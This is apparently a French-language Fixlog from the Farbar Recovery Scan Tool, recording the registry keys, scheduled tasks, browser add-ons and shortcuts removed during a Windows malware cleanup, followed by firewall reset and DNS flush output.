HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt" => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3} => non trouvé(e)
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt" => supprimé(es) avec succès
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
C:\Users\Pierre\AppData\Local\Google\Chrome\User Data\Default\File System\000 => déplacé(es) avec succès
C:\Users\Pierre\AppData\Local\Google\Chrome\User Data\Default\File System\001 => déplacé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\Services\PnkBstrA" => supprimé(es) avec succès
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt => non trouvé(e)
"HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}" => supprimé(es) avec succès
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt => non trouvé(e)
HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3} => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A7D1F03C-A759-4F0E-827C-8A15C3287FF0}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{489B6BE7-1B0E-4DE3-AC4C-A47FF337F221}" => supprimé(es) avec succès
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION => restauré(es) avec succès
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => supprimé(es) avec succès
"HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{F552DDE6-2090-4bf4-B924-6141E87789A5}" => supprimé(es) avec succès
HKLM\SOFTWARE\WOW6432Node\Classes\CLSID\{F552DDE6-2090-4bf4-B924-6141E87789A5} => non trouvé(e)
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.121.2" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.121.2" => supprimé(es) avec succès
"HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Software\MozillaPlugins\@my.com/Games" => supprimé(es) avec succès
"C:\Users\Pierre\AppData\Local\MyComGames\NPMyComDetector.dll" => non trouvé(e)
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eofcbnmajmjmplflapaojjnihcjkigck" => supprimé(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fdbpcigaolookbahgdofnimidinicfid" => supprimé(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki" => supprimé(es) avec succès
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt => non trouvé(e)
HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3} => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt => non trouvé(e)
HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3} => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04A1735C-C295-4DC6-98CB-C887E836D9BC}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04A1735C-C295-4DC6-98CB-C887E836D9BC}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{70859D1A-E349-4593-A908-FFCD20F914EB}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70859D1A-E349-4593-A908-FFCD20F914EB}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B8C32EAC-556F-4AEA-8616-69B0837BB87C}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B8C32EAC-556F-4AEA-8616-69B0837BB87C}" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => impossible à supprimer. Accès refusé.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCH Suite.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixillion Image Converter.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prism Video File Converter.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spin 3D Mesh Converter.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switch Sound File Converter.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZotacFireStorm\FireStorm.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZotacFireStorm\жÔØ Uninstall.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SIM Dashboard Server\SIM Dashboard Server.lnk => déplacé(es) avec succès
========= netsh advfirewall reset =========
Ok.
========= Fin de CMD: =========
========= Netsh advfirewall set allprofiles state on =========
Ok.
========= Fin de CMD: =========
========= ipconfig /flushdns =========
Configuration IP de Windows
Cache de r‚solution DNS vid‚.
========= Fin de CMD: =========
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 20-03-2018 22:07:22)
Résultats de la suppression planifiée des clés après redémarrage:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9BAB37E-8830-40D2-B7C3-43784CA878D9} => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F9BAB37E-8830-40D2-B7C3-43784CA878D9} => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => impossible à supprimer. Accès refusé.
==== Fin de Fixlog 22:07:22 ====